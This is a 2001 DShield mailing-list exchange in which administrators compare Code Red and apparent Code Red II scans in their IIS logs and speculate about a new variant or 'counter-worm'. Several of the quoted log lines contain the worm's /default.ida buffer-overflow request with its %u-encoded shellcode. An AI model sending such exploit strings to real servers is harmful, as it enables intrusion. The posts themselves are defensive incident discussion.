[Dshield] Code Red Host Scans (and more)

Scott Johnson scott at advancedtool.com
Sat Aug 4 18:42:41 GMT 2001


I too have been hit a couple hundred times with this request.    The first
one I received was at 13:25 EST on 8/4 with this log entry.

2001-08-04 13:25:14 24.101.45.59 - 24.161.108.188 80 GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

after that it was MANY Ip's from my local subnet on time warner/roadrunner.
Once these "X" packets as I call them started, the "N" packets were VERY few
and far between.

Could this worm be morphing itself in an attempt to avoid detection?  It
doesn't appear to be any more successfull than it's predecessor on patched
systems.

Scott Johnson

----- Original Message -----
From: "John Groseclose" <iain at caradoc.org>
To: <dshield at dshield.org>
Sent: Saturday, August 04, 2001 11:31 AM
Subject: [Dshield] Code Red Host Scans (and more)


> At 6:41 PM -0400 8/2/01, Tim Dwayne Southard wrote:
> My IDS (Cisco Secure) is not detecting the host scans from infected
> machines.  I can see the default.ida?NNN stuff but I think that is
> the second stage (infection).  I need to see the port 80 scans
> regardless of whether they are scanning MS boxes.  Any assistance
> will be repaid with good Karma.
>
> The "scan" *is* the "exploit." Code Red doesn't check first to see if
> you're running IIS before attempting to infect. There are no primary
> or secondary stages to the Code Red worm - it either infects your
> machine, or it doesn't.
>
> The weirder part is this... A "normal" Code Red attempt looks like this:
>
> cx215003-b.wwck1.ri.home.com - - [01/Aug/2001:04:31:50 -0700] "GET
> /default.ida?
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858
%ucb
>
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u
00c3
> %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"
>
> Since 12:44:09 GMT, I've been receiving *these* in my logs:
>
> h-64-105-129-178.lsancaba.covad.net - - [04/Aug/2001:05:44:09 -0700]
> "GET /defau
>
lt.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u909
0%u6
>
858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
u819
> 0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-"
"-"
> www.sacramentochats.com - - [04/Aug/2001:06:08:15 -0700] "GET
> /default.ida?XXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd
3%u7
>
801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%
u000
> 3%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
>
> It *looks* like the second worm is trying to reboot the machine via
> an exploit for cmd.exe, but since I don't have any Windows machines
> around to work with, I can't really do any experimentation with it.
> Perhaps someone wrote a "counter-worm."
> --
> John Groseclose
> iain at caradoc.org
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield




More information about the list mailing list